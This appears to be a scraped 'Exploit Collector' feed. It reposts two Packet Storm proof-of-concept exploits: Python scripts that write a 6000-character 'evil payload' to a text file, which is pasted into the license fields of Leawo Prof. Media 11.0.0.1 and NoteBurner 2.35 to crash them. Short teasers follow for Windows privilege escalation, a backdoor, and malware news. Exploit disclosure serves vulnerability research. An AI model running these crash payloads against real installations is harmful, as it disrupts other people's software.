Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Leawo Prof. Media 11.0.0.1 Denial Of Service
https://1.bp.blogspot.com/-ASAiGIAsbZo/WWlu3lcAbmI/AAAAAAAAII0/K9TarDW1B-wz0w-5-5rrjX8jWsow7QyegCLcBGAs/s1600/h100.png
Leawo Prof. Media version 11.0.0.1 suffers from a denial of service vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Leawo Prof. Media 11.0.0.1 Denial Of Service
https://1.bp.blogspot.com/-ASAiGIAsbZo/WWlu3lcAbmI/AAAAAAAAII0/K9TarDW1B-wz0w-5-5rrjX8jWsow7QyegCLcBGAs/s1600/h100.png
Leawo Prof. Media version 11.0.0.1 suffers from a denial of service vulnerability.
MD5 |
2372bdeda3c60eb93e2b722ecd563fe9Download
# Exploit Title: Leawo Prof. Media 11.0.0.1 - Denial of Service (DoS) (PoC)
# Date: 25.07.2021
# Vendor Homepage:https://www.leawo.org
# Software Link: https://www.leawo.org/downloads/total-media-converter-ultimate.html
# Exploit Author: Achilles
# Tested Version: 11.0.0.1
# Tested on: Windows 7 x64
# 1.- Run python code :
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open Leawo Prof. Media
# 4.- Click Activation Center
# 5.- Paste the content of EVIL.txt into the Field: 'Keycode'
# 6.- Click 'Register' and you will see a crash.
#!/usr/bin/env python
buffer =3D "\x41" * 6000
try:
f = open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Leawo Prof. Media 11.0.0.1 Denial Of Service
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
NoteBurner 2.35 Denial Of Service
https://4.bp.blogspot.com/-Nd-X_KvCLtU/WWlu3jy7alI/AAAAAAAAIIw/wd38Z8AjxRAJh0AdUZMKadOiqPJQRSLMgCLcBGAs/s1600/h101.png
NoteBurner version 2.35 suffers from a denial of service vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
NoteBurner 2.35 Denial Of Service
https://4.bp.blogspot.com/-Nd-X_KvCLtU/WWlu3jy7alI/AAAAAAAAIIw/wd38Z8AjxRAJh0AdUZMKadOiqPJQRSLMgCLcBGAs/s1600/h101.png
NoteBurner version 2.35 suffers from a denial of service vulnerability.
MD5 |
aa3389946376d9c650f5562f084b7810Download
# Exploit Title: NoteBurner 2.35 - Denial Of Service (DoS) (PoC)
# Date: 25.07.2021
# Vendor Homepage:https://www.noteburner.com/
# Software Link: https://anonfiles.com/13h9Hb82ub/noteburner_exe
# Exploit Author: Achilles
# Tested Version: 2.35
# Tested on: Windows 7 x64
# 1.- Run python code :
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open Noteburner
# 4.- Click More and Enter License Code
# 5.- Paste the content of EVIL.txt into the Field: 'Name' and 'Code'
# 6.- Click 'OK' and you will see a crash.
#!/usr/bin/env python
buffer = "\x41" * 6000
try:
f=open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
NoteBurner 2.35 Denial Of Service
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
Backdoor.Win32.Agent.cu Code Execution
___________________________
@hacking_Attack
@Hacking_Video
Backdoor.Win32.Agent.cu Code Execution
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Backdoor.Win32.Agent.cu Code Execution
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Windows PrivEsc with SeBackupPrivilege
https://cdn-images-1.medium.com/max/2550/1*UJCYdSWNTKIySr1kxWU3ag.jpeg
Obtain NTLM hashes in Windows Domain Controller machines
Continue reading on R3d Buck3T »
___________________________
@hacking_Attack
@Hacking_Video
Windows PrivEsc with SeBackupPrivilege
https://cdn-images-1.medium.com/max/2550/1*UJCYdSWNTKIySr1kxWU3ag.jpeg
Obtain NTLM hashes in Windows Domain Controller machines
Continue reading on R3d Buck3T »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Windows PrivEsc with SeBackupPrivilege
Obtain NTLM hashes in Windows Domain Controller machines
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
HacksKit, una colección de Scripts.
https://cdn-images-1.medium.com/max/2600/1*xQJcqKXc697XoT_d5VNZeA.jpeg
Como alguien que trabaja en el área de Seguridad Informática, me he encontrado con situaciones que se repiten constantemente, bajo el…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
HacksKit, una colección de Scripts.
https://cdn-images-1.medium.com/max/2600/1*xQJcqKXc697XoT_d5VNZeA.jpeg
Como alguien que trabaja en el área de Seguridad Informática, me he encontrado con situaciones que se repiten constantemente, bajo el…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
HacksKit, una colección de Scripts.
Como alguien que trabaja en el área de Seguridad Informática, me he encontrado con situaciones que se repiten constantemente, bajo el…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
How do we know if our smartphone was hacked?
https://cdn-images-1.medium.com/max/2600/0*IJtjOby0OUgcQfbh
Six Signs to look for.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
How do we know if our smartphone was hacked?
https://cdn-images-1.medium.com/max/2600/0*IJtjOby0OUgcQfbh
Six Signs to look for.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
How do we know if our smartphone was hacked?
Six Signs to look for.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Microsoft advierte sobre el malware LemonDuck dirigido a sistemas Windows y Linux.
https://cdn-images-1.medium.com/max/1500/0*OEHYKYFL8cKXtU32
POR EHACKING
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Microsoft advierte sobre el malware LemonDuck dirigido a sistemas Windows y Linux.
https://cdn-images-1.medium.com/max/1500/0*OEHYKYFL8cKXtU32
POR EHACKING
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Microsoft advierte sobre el malware LemonDuck dirigido a sistemas Windows y Linux.
POR EHACKING
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Who Invented the Internet?
https://cdn-images-1.medium.com/max/2600/0*cJauGc8jvISadxA_
What most of us think of as the Internet is really just the pretty face of the operation — browser windows, websites, URLs, and search…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Who Invented the Internet?
https://cdn-images-1.medium.com/max/2600/0*cJauGc8jvISadxA_
What most of us think of as the Internet is really just the pretty face of the operation — browser windows, websites, URLs, and search…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Who Invented the Internet?
What most of us think of as the Internet is really just the pretty face of the operation — browser windows, websites, URLs, and search…